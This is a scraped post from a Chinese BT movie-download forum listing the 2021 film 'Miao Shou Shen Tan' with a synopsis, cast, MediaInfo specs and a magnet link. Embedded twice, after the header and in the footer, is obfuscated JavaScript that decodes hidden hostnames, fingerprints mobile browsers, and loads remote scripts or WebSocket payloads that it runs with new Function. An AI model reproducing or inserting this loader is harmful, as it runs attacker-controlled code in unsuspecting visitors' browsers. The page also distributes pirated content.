妙手神探之鬼门十三针[国语配音/中文字幕].Miao.Shou.Shen.Tan.2021.4K.WEB-DL.H265.DDP2.0 1.99GB

版主小s 2月前 191

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 妙手神探之鬼门十三针
◎年  代 2021
◎产  地 中国大陆
◎语  言 汉语普通话
◎上映日期 2021-08-26(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/35566772/
◎导  演 沈金飞 Jinfei Shen (id:1384008)
◎演  员 贺刚 Gang He (id:1313048)
       柏程俊 Chengjun Bo (id:1361311)
       张鑫磊 Xinlei Zhang (id:1395230)

◎标  签 大陆 / 剧情 / 2021

◎简  介
  相传,流传千年的古医秘针“鬼门十三针”正可救人于鬼门,邪可控人于傀儡,人人皆想得之,奈何它早已匿于江湖,无迹可寻。当世人逐渐遗忘“鬼门十三针”之时,一起诡异莫测的连环杀人案却牵扯出“鬼门十三针”,以及藏于它身后的鬼门秘派,案情愈发扑朔迷离。与此同时,曾因谋害恩师被逐出鬼门的宋敬之在调查连环杀人案时,莫名成为连环杀人案的凶手。面对种种铁证,宋敬之与幕后凶手展开了一场关乎生死和救赎的正义之战。危机时刻,一位毁容老妇认下所有罪名,螳螂捕蝉黄雀在后,亦真亦假,究竟谁才是真正的凶手?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 304574075195542884184100970541511749962 (0xE522D54AA655134322965D1D91F6314A)

  4. Complete name                            : 妙手神探之鬼门十三针[email protected]mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 1.99 GiB

  8. Duration                                 : 1 h 7 min

  9. Overall bit rate                         : 4 232 kb/s

  10. Encoded date                             : UTC 2021-08-26 20:10:44

  11. Writing application                      : mkvmerge v51.0.0 ('I Wish') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.2


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 7 min

  20. Bit rate                                 : 4 134 kb/s

  21. Width                                    : 3 840 pixels

  22. Height                                   : 1 632 pixels

  23. Display aspect ratio                     : 2.35:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 25.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 8 bits

  29. Bits/(Pixel*Frame)                       : 0.026

  30. Stream size                              : 1.94 GiB (98%)

  31. Default                                  : Yes

  32. Forced                                   : No


  33. Audio

  34. ID                                       : 2

  35. Format                                   : E-AC-3

  36. Format/Info                              : Enhanced AC-3

  37. Commercial name                          : Dolby Digital Plus

  38. Codec ID                                 : A_EAC3

  39. Duration                                 : 1 h 7 min

  40. Bit rate mode                            : Constant

  41. Bit rate                                 : 96.0 kb/s

  42. Channel(s)                               : 2 channels

  43. Channel layout                           : L R

  44. Sampling rate                            : 48.0 kHz

  45. Frame rate                               : 31.250 FPS (1536 SPF)

  46. Compression mode                         : Lossy

  47. Stream size                              : 46.1 MiB (2%)

  48. Service kind                             : Complete Main

  49. Default                                  : Yes

  50. Forced                                   : No



TAGS 动作 剧情

磁力链:
  • magnet:?xt=urn:btih:506803BC9A5204620736ED44589FC614CAA578E0

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};